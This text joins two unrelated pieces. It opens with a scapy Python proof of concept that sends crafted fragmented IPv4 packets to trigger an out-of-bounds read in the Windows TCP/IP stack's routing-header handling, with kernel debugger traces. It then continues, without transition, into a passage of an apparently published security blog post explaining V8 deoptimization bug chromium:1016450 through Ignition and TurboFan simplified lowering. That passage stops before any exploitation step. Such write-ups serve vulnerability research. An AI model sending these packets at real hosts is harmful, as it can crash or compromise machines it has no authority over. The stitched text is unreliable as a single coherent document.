Here is the PoC I built based on the high quality blogpost put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
    '''
    kd> g
    oob?
    tcpip!Ipv4pReceiveRoutingHeader+0x16a:
    fffff804`453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x16e:
    fffff804`453c6f7e 498bd5          mov     rdx,r13
    kd> db @r13
    ffffb90e`85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
    kd> dqs @r13 l1
    ffffb90e`85b78220  ffffb90e`85b782c0
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x171:
    fffff804`453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff804`4541f2e0)]
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x178:
    fffff804`453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`453b5164)
    kd> db @rdx
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17d:
    fffff804`453c6f8d 84c0            test    al,al
    kd> r.
    al=00000000`00000000  al=00000000`00000000
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17f:
    fffff804`453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804`453c7473)
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x185:
    fffff804`453c6f95 498bcd          mov     rcx,r13
    kd>
    Breakpoint 3 hit
    tcpip!Ipv4pReceiveRoutingHeader+0x188:
    fffff804`453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff804`45354f84)
    kd> dqs @rcx l1
    ffffb90e`85b78220  ffffb90e`85b782c0

    Call-stack (skip first hit):
      kd> kc
      # Call Site
      00 tcpip!Ipv4pReceiveRoutingHeader
      01 tcpip!IppReceiveHeaderBatch
      02 tcpip!Ipv4pReassembleDatagram
      03 tcpip!Ipv4pReceiveFragment
      04 tcpip!Ipv4pReceiveFragmentList
      05 tcpip!IppReceiveHeaderBatch
      06 tcpip!IppFlcReceivePacketsCore
      07 tcpip!IpFlcReceivePackets
      08 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
      09 tcpip!FlReceiveNetBufferListChainCalloutRoutine
      0a nt!KeExpandKernelStackAndCalloutInternal
      0b nt!KeExpandKernelStackAndCalloutEx
      0c tcpip!FlReceiveNetBufferListChain

    Snippet:
      __int16 __fastcall Ipv4pReceiveRoutingHeader(Packet_t *Packet)
      {
        // ...
        // kd> db @rax
        // ffffdc07`ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
        RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
        NetioAdvanceNetBufferList(NetBufferList, v8);
        OptionLenFirst = RoutingHeaderFirst[1];
        LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
        RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
        if (OptionLenFirst < 7u ||
          LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR))
        {
          // ...
          goto Bail_0;
        }
        // ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that, the out of bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #  - IppIsInvalidSourceAddressStrict,
                #  - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #     || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #         v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #         v14 < v13) )
                # The upper byte of handling_restrictions is `RoutingHeaderFirst[2]` in the above snippet
                # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                #   kd>
                #   tcpip!Ipv4pReceiveRoutingHeader+0x178:
                #   fffff804`5c076f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`5c065164)
                #   kd> db @rdx
                #   ffffdc07`ff209175  62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07  bc.T$0H...H.. ..
                #                                ^
                #                                |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface='eth1')

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', default = 'ff02::1')
    parser.add_argument('--dport', default = 500)
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()

Modern attacks on the Chrome browser: optimizations and deoptimizations

Introduction

Late 2019, I presented at an internal Azimuth Security conference some work on hacking Chrome through its JavaScript engine.

One of the topics I was playing with at that time was deoptimization, so I discussed, among other things, vulnerabilities in the deoptimizer. For my talk at InfiltrateCon 2020 in Miami I was planning to discuss several components of V8, one of them being the deoptimizer. But as you all know, things didn't quite go as expected this year and the event has been postponed several times.

This blog post is actually an internal write-up I made for Azimuth Security a year ago and we decided to finally release it publicly.

Also, if you want to get serious about breaking browsers and feel like joining us, we're currently looking for experienced hackers (US/AU/UK/FR or anywhere else remotely). Feel free to reach out on twitter or by e-mail.

Special thanks to the legendary Mark Dowd and John McDonald for letting me publish this here.

For those unfamiliar with TurboFan, you may want to read an Introduction to TurboFan first. Also, Benedikt Meurer gave a lot of very interesting talks that are strongly recommended to anyone interested in better understanding V8's internals.

Motivation

The commit

To understand this security bug, it is necessary to delve into V8's internals.

Let's start with what the commit says:

Fixes word64-lowered BigInt in FrameState accumulator

Bug: chromium:1016450
Change-Id: I4801b5ffb0ebea92067aa5de37e11a4e75dcd3c0
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1873692
Reviewed-by: Georg Neis <[email protected]>
Commit-Queue: Nico Hartmann <[email protected]>
Cr-Commit-Position: refs/heads/master@{#64469}

It fixes VisitFrameState and VisitStateValues in src/compiler/simplified-lowering.cc.

diff --git a/src/compiler/simplified-lowering.cc b/src/compiler/simplified-lowering.cc
index 2e8f40f..abbdae3 100644
--- a/src/compiler/simplified-lowering.cc
+++ b/src/compiler/simplified-lowering.cc
@@ -1197,7 +1197,7 @@
         // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
         // truncated BigInts.
         if (TypeOf(input).Is(Type::BigInt())) {
-          ProcessInput(node, i, UseInfo::AnyTagged());
+          ConvertInput(node, i, UseInfo::AnyTagged());
         }

         (*types)[i] =
@@ -1220,11 +1220,22 @@
     // Accumulator is a special flower - we need to remember its type in
     // a singleton typed-state-values node (as if it was a singleton
     // state-values node).
+    Node* accumulator = node->InputAt(2);
     if (propagate()) {
-      EnqueueInput(node, 2, UseInfo::Any());
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        EnqueueInput(node, 2, UseInfo::AnyTagged());
+      } else {
+        EnqueueInput(node, 2, UseInfo::Any());
+      }
     } else if (lower()) {
+      // TODO(nicohartmann): Remove, once the deoptimizer can rematerialize
+      // truncated BigInts.
+      if (TypeOf(accumulator).Is(Type::BigInt())) {
+        ConvertInput(node, 2, UseInfo::AnyTagged());
+      }
       Zone* zone = jsgraph_->zone();
-      Node* accumulator = node->InputAt(2);
       if (accumulator == jsgraph_->OptimizedOutConstant()) {
         node->ReplaceInput(2, jsgraph_->SingleDeadTypedStateValues());
       } else {
@@ -1237,7 +1248,7 @@
         node->ReplaceInput(
             2, jsgraph_->graph()->NewNode(jsgraph_->common()->TypedStateValues(
                                               types, SparseInputMask::Dense()),
-                                          accumulator));
+                                          node->InputAt(2)));
       }
     }

This can be linked to a different commit that adds a related regression test:

Regression test for word64-lowered BigInt accumulator

This issue was fixed in https://chromium-review.googlesource.com/c/v8/v8/+/1873692

Bug: chromium:1016450
Change-Id: I56e1c504ae6876283568a88a9aa7d24af3ba6474
Reviewed-on: https://chromium-review.googlesource.com/c/v8/v8/+/1876057
Commit-Queue: Nico Hartmann <[email protected]>
Auto-Submit: Nico Hartmann <[email protected]>
Reviewed-by: Jakob Gruber <[email protected]>
Reviewed-by: Georg Neis <[email protected]>
Cr-Commit-Position: refs/heads/master@{#64738}

// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Flags: --allow-natives-syntax --opt --no-always-opt

let g = 0;

function f(x) {
  let y = BigInt.asUintN(64, 15n);
  // Introduce a side effect to force the construction of a FrameState that
  // captures the value of y.
  g = 42;
  try {
    return x + y;
  } catch(_) {
    return y;
  }
}


%PrepareFunctionForOptimization(f);
assertEquals(16n, f(1n));
assertEquals(17n, f(2n));
%OptimizeFunctionOnNextCall(f);
assertEquals(16n, f(1n));
assertOptimized(f);
assertEquals(15n, f(0));
assertUnoptimized(f);

Long story short

This vulnerability is a bug in the way the simplified lowering phase of TurboFan deals with FrameState and StateValues nodes. Those nodes are related to deoptimization.

During the code generation phase, using those nodes, TurboFan builds deoptimization input data that are used when the runtime bails out to the deoptimizer.

Because after a deoptimization execution goes from optimized native code back to interpreted bytecode, the deoptimizer needs to know where to deoptimize to (ex: which bytecode offset?) and how to build a correct frame (ex: which ignition registers?). To do that, the deoptimizer uses the deoptimization input data built during code generation.

Using this bug, it is possible to make code generation incorrectly build deoptimization input data so that the deoptimizer will materialize a fake object. Then, it redirects the execution to an ignition bytecode handler that has an arbitrary object pointer referenced by its accumulator register.

Internals

To understand this bug, we want to know:

  • what is ignition (because we deoptimize back to ignition)
  • what is simplified lowering (because that's where the bug is)
  • what is a deoptimization (because it is impacted by the bug and will materialize a fake object for us)

Ignition

Overview

V8 features an interpreter called Ignition. It uses TurboFan's macro-assembler. This assembler is architecture-independent and TurboFan is responsible for compiling these instructions down to the target architecture.

Ignition is a register machine. That means an opcode's inputs and output are registers. There is an accumulator used as an implicit operand for many opcodes.

For every opcode, an associated handler is generated. Therefore, executing bytecode is mostly a matter of fetching the current opcode and dispatching it to the correct handler.

Let's observe the bytecode for a simple JavaScript function.

let opt_me = (o, val) => {
  let value = val + 42;
  o.x = value;
}
opt_me({x:1.1});

Using the --print-bytecode and --print-bytecode-filter=opt_me flags we can dump the corresponding generated bytecode.

Parameter count 3
Register count 1
Frame size 8
   13 E> 0000017DE515F366 @    0 : a5                StackCheck
   41 S> 0000017DE515F367 @    1 : 25 02             Ldar a1
   45 E> 0000017DE515F369 @    3 : 40 2a 00          AddSmi [42], [0]
         0000017DE515F36C @    6 : 26 fb             Star r0
   53 S> 0000017DE515F36E @    8 : 25 fb             Ldar r0
   57 E> 0000017DE515F370 @   10 : 2d 03 00 01       StaNamedProperty a0, [0], [1]
         0000017DE515F374 @   14 : 0d                LdaUndefined
   67 S> 0000017DE515F375 @   15 : a9                Return
Constant pool (size = 1)
0000017DE515F319: [FixedArray] in OldSpace
 - map: 0x00d580740789 <Map>
 - length: 1
           0: 0x017de515eff9 <String[#1]: x>
Handler Table (size = 0)

Disassembling the function shows that the low level code is merely a trampoline to the interpreter entry point. In our case, running an x64 build, that means the trampoline jumps to the code generated by Builtins::Generate_InterpreterEntryTrampoline in src/builtins/x64/builtins-x64.cc.

d8> %DisassembleFunction(opt_me)
0000008C6B5043C1: [Code]
 - map: 0x02ebfe8409b9 <Map>
kind = BUILTIN
name = InterpreterEntryTrampoline
compiler = unknown
address = 0000004B05BFE830

Trampoline (size = 13)
0000008C6B504400     0  49ba80da52b0fd7f0000 REX.W movq r10,00007FFDB052DA80  (InterpreterEntryTrampoline)
0000008C6B50440A     a  41ffe2         jmp r10

This code simply fetches the instructions from the function's BytecodeArray and executes the corresponding ignition handler from a dispatch table.

d8> %DebugPrint(opt_me)
DebugPrint: 000000FD8C6CA819: [Function]
// ...
 - code: 0x01524c1c43c1 <Code BUILTIN InterpreterEntryTrampoline>
 - interpreted
 - bytecode: 0x01b76929f331 <BytecodeArray[16]>
// ...

Below is the part of Builtins::Generate_InterpreterEntryTrampoline that loads the address of the dispatch table into the kInterpreterDispatchTableRegister. Then it selects the current opcode using the kInterpreterBytecodeOffsetRegister and kInterpreterBytecodeArrayRegister. Finally, it computes kJavaScriptCallCodeStartRegister = dispatch_table[bytecode * pointer_size] and then calls the handler. Those registers are described in src/codegen/x64/register-x64.h.

  // Load the dispatch table into a register and dispatch to the bytecode
  // handler at the current bytecode offset.
  Label do_dispatch;
  __ bind(&do_dispatch);
  __ Move(
      kInterpreterDispatchTableRegister,
      ExternalReference::interpreter_dispatch_table_address(masm->isolate()));
  __ movzxbq(r11, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  __ movq(kJavaScriptCallCodeStartRegister,
          Operand(kInterpreterDispatchTableRegister, r11,
                  times_system_pointer_size, 0));
  __ call(kJavaScriptCallCodeStartRegister);
  masm->isolate()->heap()->SetInterpreterEntryReturnPCOffset(masm->pc_offset());

  // Any returns to the entry trampoline are either due to the return bytecode
  // or the interpreter tail calling a builtin and then a dispatch.

  // Get bytecode array and bytecode offset from the stack frame.
  __ movq(kInterpreterBytecodeArrayRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeArrayFromFp));
  __ movq(kInterpreterBytecodeOffsetRegister,
          Operand(rbp, InterpreterFrameConstants::kBytecodeOffsetFromFp));
  __ SmiUntag(kInterpreterBytecodeOffsetRegister,
              kInterpreterBytecodeOffsetRegister);

  // Either return, or advance to the next bytecode and dispatch.
  Label do_return;
  __ movzxbq(rbx, Operand(kInterpreterBytecodeArrayRegister,
                          kInterpreterBytecodeOffsetRegister, times_1, 0));
  AdvanceBytecodeOffsetOrReturn(masm, kInterpreterBytecodeArrayRegister,
                                kInterpreterBytecodeOffsetRegister, rbx, rcx,
                                &do_return);
  __ jmp(&do_dispatch);
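
In Python terms, the do_dispatch loop above behaves roughly like the toy model below. This is illustrative only: the frame layout and handler signatures are made up, and (as we'll see shortly) real handlers usually dispatch to the next opcode themselves.

# Toy model of the interpreter dispatch loop (not V8 code).
def interpreter_entry(bytecode_array, dispatch_table):
    offset = 0
    accumulator = None
    while True:
        opcode = bytecode_array[offset]    # movzxbq r11, [array + offset]
        handler = dispatch_table[opcode]   # dispatch_table[opcode * pointer_size]
        offset, accumulator, done = handler(bytecode_array, offset, accumulator)
        if done:                           # hit the Return bytecode
            return accumulator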

Ignition handlers

Ignition handlers are implemented in src/interpreter/interpreter-generator.cc. They are declared using the IGNITION_HANDLER macro. Let's look at a few examples.

Below is the implementation of JumpIfTrue. The careful reader will notice that it is actually similar to the Code Stub Assembler code (used to implement some of the builtins).

// JumpIfTrue <imm>
//
// Jump by the number of bytes represented by an immediate operand if the
// accumulator contains true. This only works for boolean inputs, and
// will misbehave if passed arbitrary input values.
IGNITION_HANDLER(JumpIfTrue, InterpreterAssembler) {
  Node* accumulator = GetAccumulator();
  Node* relative_jump = BytecodeOperandUImmWord(0);
  CSA_ASSERT(this, TaggedIsNotSmi(accumulator));
  CSA_ASSERT(this, IsBoolean(accumulator));
  JumpIfWordEqual(accumulator, TrueConstant(), relative_jump);
}

Binary instructions making use of inline caching actually execute code implemented in src/ic/binary-op-assembler.cc.

// AddSmi <imm>
//
// Adds an immediate value <imm> to the value in the accumulator.
IGNITION_HANDLER(AddSmi, InterpreterBinaryOpAssembler) {
  BinaryOpSmiWithFeedback(&BinaryOpAssembler::Generate_AddWithFeedback);
}

void BinaryOpWithFeedback(BinaryOpGenerator generator) {
    Node* lhs = LoadRegisterAtOperandIndex(0);
    Node* rhs = GetAccumulator();
    Node* context = GetContext();
    Node* slot_index = BytecodeOperandIdx(1);
    Node* maybe_feedback_vector = LoadFeedbackVector();

    BinaryOpAssembler binop_asm(state());
    Node* result = (binop_asm.*generator)(context, lhs, rhs, slot_index,
                                          maybe_feedback_vector, false);
    SetAccumulator(result);
    Dispatch();
}

From this code, we understand that when executing AddSmi [42], [0], V8 ends up executing code generated by BinaryOpAssembler::Generate_AddWithFeedback. The left hand side of the addition is operand 0 ([42] in this case); the right hand side is loaded from the accumulator register. It also loads a slot from the feedback vector using the index specified in operand 1. The result of the addition is stored in the accumulator.
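
As a rough sketch (the frame object and its attributes are made up for illustration), the handler behaves like this:

# Illustrative sketch of the AddSmi [imm], [slot] handler (not V8 code).
def add_smi_handler(frame, imm, feedback_slot):
    lhs = imm                                   # operand 0, e.g. 42
    rhs = frame.accumulator                     # implicit operand
    frame.feedback[feedback_slot].record(lhs, rhs)  # update type feedback
    frame.accumulator = lhs + rhs               # result lands in the accumulator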

It is interesting to observe the call to Dispatch. We may expect that every handler is called from within the do_dispatch label of InterpreterEntryTrampoline, whereas actually the current ignition handler may do the dispatch itself (and thus does not directly go back to do_dispatch).

Debugging

There is a built-in feature for debugging ignition bytecode that you can enable by switching v8_enable_trace_ignition to true and recompiling the engine. You may also want to change v8_enable_trace_feedbacks.

This unlocks some interesting flags in the d8 shell such as:

  • --trace-ignition
  • --trace_feedback_updates

There are also a few interesting runtime functions:

  • Runtime_InterpreterTraceBytecodeEntry
    • prints ignition registers before executing an opcode
  • Runtime_InterpreterTraceBytecodeExit
    • prints ignition registers after executing an opcode
  • Runtime_InterpreterTraceUpdateFeedback
    • displays updates to the feedback vector slots

Let's try debugging a simple add function.

function add(a,b) {
    return a + b;
}

We can now see a dump of ignition registers at every step of the execution using --trace-ignition.

      [          r1 -> 0x193680a1f8e9 <JSFunction add (sfi = 0x193680a1f759)> ]
      [          r2 -> 0x3ede813004a9 <undefined> ]
      [          r3 -> 42 ]
      [          r4 -> 1 ]
 -> 0x193680a1fa56 @    0 : a5                StackCheck 
 -> 0x193680a1fa57 @    1 : 25 02             Ldar a1
      [          a1 -> 1 ]
      [ accumulator <- 1 ]
 -> 0x193680a1fa59 @    3 : 34 03 00          Add a0, [0]
      [ accumulator -> 1 ]
      [          a0 -> 42 ]
      [ accumulator <- 43 ]
 -> 0x193680a1fa5c @    6 : a9                Return 
      [ accumulator -> 43 ]
 -> 0x193680a1f83a @   36 : 26 fb             Star r0
      [ accumulator -> 43 ]
      [          r0 <- 43 ]
 -> 0x193680a1f83c @   38 : a9                Return 
      [ accumulator -> 43 ]

Simplified lowering

Simplified lowering is actually divided into three main phases (a crude, runnable model of the first one is sketched right after this list):

  1. The truncation propagation phase (RunTruncationPropagationPhase)
    • backward propagation of truncations
  2. The type propagation phase (RunTypePropagationPhase)
    • forward propagation of types from type feedback
  3. The lowering phase (Run, after calling the previous phases)
    • may lower nodes
    • may insert conversion nodes
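
Here is the promised toy: a crude but runnable Python version of the backward truncation propagation of phase 1. The node names match the example studied below; everything else is made up, and real V8 merges truncations instead of just overwriting them.

# Each node maps to a list of (input node, truncation requested for it).
graph = {
    'End':    [('Return', 'no-value-use')],
    'Return': [('NumberConstant#29', 'truncate-to-word32'),
               ('SpeculativeNumberModulus', 'no-truncation')],
    'SpeculativeNumberModulus': [('NumberConstant#24', 'truncate-to-word32'),
                                 ('Phi#23', 'truncate-to-word32')],
    'Phi#23': [('NumberConstant#20', 'truncate-to-word32'),
               ('NumberConstant#22', 'truncate-to-word32')],
    'NumberConstant#29': [], 'NumberConstant#24': [],
    'NumberConstant#20': [], 'NumberConstant#22': [],
}
truncations = {}
queue = ['End']
while queue:
    node = queue.pop(0)
    for input_node, trunc in graph[node]:
        if truncations.get(input_node) != trunc:  # revisit on change
            truncations[input_node] = trunc
            queue.append(input_node)
print(truncations)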

To get a better understanding, we'll study the evolution of the sea of nodes graph for the function below:

function f(a) {
  if (a) {
    var x = 2;
  }
  else {
    var x = 5;
  }
  return 0x42 % x;
}
%PrepareFunctionForOptimization(f);
f(true);
f(false);
%OptimizeFunctionOnNextCall(f);
f(true);

Propagating truncations

To understand how truncations get propagated, we want to trace the simplified lowering using --trace-representation and look at the sea of nodes in Turbolizer right before the simplified lowering phase, which is done by selecting the escape analysis phase in the menu.

The first phase starts from the End node. It visits the node and then enqueues its inputs. It doesn't truncate any of its inputs. The output is tagged.

 visit #31: End (trunc: no-value-use)
  initial #30: no-value-use
  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
  // ...
      case IrOpcode::kEnd:
       // ...
      case IrOpcode::kJSParseInt:
        VisitInputs(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);

Then, for every node in the queue, the corresponding visitor is called. In that case, only a Return node is in the queue.

The visitor indicates use information. The first input is truncated to a word32. The other inputs are not truncated. The output is tagged.

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
    // ...
    switch (node->opcode()) {
      // ...
      case IrOpcode::kReturn:
        VisitReturn(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);
      // ...
    }
  }

  void VisitReturn(Node* node) {
    int tagged_limit = node->op()->ValueInputCount() +
                       OperatorProperties::GetContextInputCount(node->op()) +
                       OperatorProperties::GetFrameStateInputCount(node->op());
    // Visit integer slot count to pop
    ProcessInput(node, 0, UseInfo::TruncatingWord32());

    // Visit value, context and frame state inputs as tagged.
    for (int i = 1; i < tagged_limit; i++) {
      ProcessInput(node, i, UseInfo::AnyTagged());
    }
    // Only enqueue other inputs (effects, control).
    for (int i = tagged_limit; i < node->InputCount(); i++) {
      EnqueueInput(node, i);
    }
  }

In the trace, we indeed observe that the End node didn't propagate any truncation to the Return node. However, the Return node does truncate its first input.

 visit #30: Return (trunc: no-value-use)
  initial #29: truncate-to-word32
  initial #28: no-truncation (but distinguish zeros)
   queue #28?: no-truncation (but distinguish zeros)
  initial #21: no-value-use

All the inputs (#29, #28, #21) are added to the queue and now have to be visited.

We can see that the truncation to word32 has been propagated to the node 29.

 visit #29: NumberConstant (trunc: truncate-to-word32)

When visiting node #28, the SpeculativeNumberModulus visitor decides, in that case, that the first two inputs should get truncated to word32.

 visit #28: SpeculativeNumberModulus (trunc: no-truncation (but distinguish zeros))
  initial #24: truncate-to-word32
  initial #23: truncate-to-word32
  initial #13: no-value-use
   queue #21?: no-value-use

Indeed, if we look at the code of the visitor: when both inputs are typed as Type::Unsigned32OrMinusZeroOrNaN() (which is the case here, since they are typed as Range(66,66) and Range(2,5)), and either the node truncation is a word32 truncation (not the case here, since there is no truncation) or the node is typed as Type::Unsigned32() (true, because the node is typed as Range(0,4)), then a call to VisitWord32TruncatingBinop is made.

This visitor indicates a truncation to word32 on the first two inputs and sets the output representation to kWord32 (with Type::Any() as the restriction type). It also adds all the inputs to the queue.

  void VisitSpeculativeNumberModulus(Node* node, Truncation truncation,
                                     SimplifiedLowering* lowering) {
    if (BothInputsAre(node, Type::Unsigned32OrMinusZeroOrNaN()) &&
        (truncation.IsUsedAsWord32() ||
         NodeProperties::GetType(node).Is(Type::Unsigned32()))) {
      // => unsigned Uint32Mod
      VisitWord32TruncatingBinop(node);
      if (lower()) DeferReplacement(node, lowering->Uint32Mod(node));
      return;
    }
    // ...
  }

  void VisitWord32TruncatingBinop(Node* node) {
    VisitBinop(node, UseInfo::TruncatingWord32(),
               MachineRepresentation::kWord32);
  }

  // Helper for binops of the I x I -> O variety.
  void VisitBinop(Node* node, UseInfo input_use, MachineRepresentation output,
                  Type restriction_type = Type::Any()) {
    VisitBinop(node, input_use, input_use, output, restriction_type);
  }

  // Helper for binops of the R x L -> O variety.
  void VisitBinop(Node* node, UseInfo left_use, UseInfo right_use,
                  MachineRepresentation output,
                  Type restriction_type = Type::Any()) {
    DCHECK_EQ(2, node->op()->ValueInputCount());
    ProcessInput(node, 0, left_use);
    ProcessInput(node, 1, right_use);
    for (int i = 2; i < node->InputCount(); i++) {
      EnqueueInput(node, i);
    }
    SetOutput(node, output, restriction_type);
  }

For the next node in the queue (#21), the visitor doesn't indicate any truncation.

 visit #21: Merge (trunc: no-value-use)
  initial #19: no-value-use
  initial #17: no-value-use

It simply adds its own inputs to the queue and indicates that this Merge node has a kTagged output representation.

  void VisitNode(Node* node, Truncation truncation,
                 SimplifiedLowering* lowering) {
  // ...
      case IrOpcode::kMerge:
      // ...
      case IrOpcode::kJSParseInt:
        VisitInputs(node);
        // Assume the output is tagged.
        return SetOutput(node, MachineRepresentation::kTagged);

The SpeculativeNumberModulus node indeed propagated a truncation to word32 to its inputs 24 (NumberConstant) and 23 (Phi).

 visit #24: NumberConstant (trunc: truncate-to-word32)
 visit #23: Phi (trunc: truncate-to-word32)
  initial #20: truncate-to-word32
  initial #22: truncate-to-word32
   queue #21?: no-value-use
 visit #13: JSStackCheck (trunc: no-value-use)
  initial #12: no-truncation (but distinguish zeros)
  initial #14: no-truncation (but distinguish zeros)
  initial #6: no-value-use
  initial #0: no-value-use

Now let's have a look at the phi visitor. It simply forwards the truncation to its value inputs and adds them to the queue. The output representation is inferred from the phi node's type.

  // Helper for handling phis.
  void VisitPhi(Node* node, Truncation truncation,
                SimplifiedLowering* lowering) {
    MachineRepresentation output =
        GetOutputInfoForPhi(node, TypeOf(node), truncation);
    // Only set the output representation if not running with type
    // feedback. (Feedback typing will set the representation.)
    SetOutput(node, output);

    int values = node->op()->ValueInputCount();
    if (lower()) {
      // Update the phi operator.
      if (output != PhiRepresentationOf(node->op())) {
        NodeProperties::ChangeOp(node, lowering->common()->Phi(output, values));
      }
    }

    // Convert inputs to the output representation of this phi, pass the
    // truncation along.
    UseInfo input_use(output, truncation);
    for (int i = 0; i < node->InputCount(); i++) {
      ProcessInput(node, i, i < values ? input_use : UseInfo::None());
    }
  }

Finally, the phi node's inputs get visited.

 visit #20: NumberConstant (trunc: truncate-to-word32)
 visit #22: NumberConstant (trunc: truncate-to-word32)

They don't have any inputs to enqueue. Output representation is set to tagged signed.

      case IrOpcode::kNumberConstant: {
        double const value = OpParameter<double>(node->op());
        int value_as_int;
        if (DoubleToSmiInteger(value, &value_as_int)) {
          VisitLeaf(node, MachineRepresentation::kTaggedSigned);
          if (lower()) {
            intptr_t smi = bit_cast<intptr_t>(Smi::FromInt(value_as_int));
            DeferReplacement(node, lowering->jsgraph()->IntPtrConstant(smi));
          }
          return;
        }
        VisitLeaf(node, MachineRepresentation::kTagged);
        return;
      }
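
On x64 builds without pointer compression (as in the dumps of this post), Smi::FromInt simply stores the 32-bit integer in the upper half of the word, leaving the low tag bit at 0 (HeapObject pointers have the low bit set to 1 instead). A quick sketch:

# Smi encoding on x64 without pointer compression (sketch, not V8 code).
def smi_from_int(value):
    return (value & 0xffffffff) << 32

print(hex(smi_from_int(42)))   # 0x2a00000000, printed by V8 as <Smi 42>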

We've unrolled enough of the algorithm by hand to understand the first truncation propagation phase. Let's have a look at the type propagation phase.

Please note that a visitor may behave differently according to the phase that is currently executing.

  bool lower() const { return phase_ == LOWER; }
  bool retype() const { return phase_ == RETYPE; }
  bool propagate() const { return phase_ == PROPAGATE; }

That's why the NumberConstant visitor does not trigger a DeferReplacement during the truncation propagation phase.

Retyping

There isn't much to say about the retyping phase. Starting from the End node, every node of the graph is pushed onto a stack. Then, starting from the top of the stack, types are updated with UpdateFeedbackType and the nodes are revisited. This allows updated type information to be propagated forward (starting from the Start, not the End).

As we can observe by tracing the phase, that's when final output representations are computed and displayed:

 visit #29: NumberConstant
  ==> output kRepTaggedSigned

For nodes 23 (phi) and 28 (SpeculativeNumberModulus), there is also an updated feedback type.

#23:Phi[kRepTagged](#20:NumberConstant, #22:NumberConstant, #21:Merge)  [Static type: Range(2, 5)]
 visit #23: Phi
  ==> output kRepWord32
#28:SpeculativeNumberModulus[SignedSmall](#24:NumberConstant, #23:Phi, #13:JSStackCheck, #21:Merge)  [Static type: Range(0, 4)]
 visit #28: SpeculativeNumberModulus
  ==> output kRepWord32

Lowering and inserting conversions

Now that every node has been associated with use information for every input as well as an output representation, the last phase consists of:

  • lowering the node itself to a more specific one (via a DeferReplacement for instance)
  • converting nodes when the output representation of an input doesn't match with the expected use information for this input (could be done with ConvertInput)

Note that a node won't necessarily change. There may not be any lowering and/or any conversion.

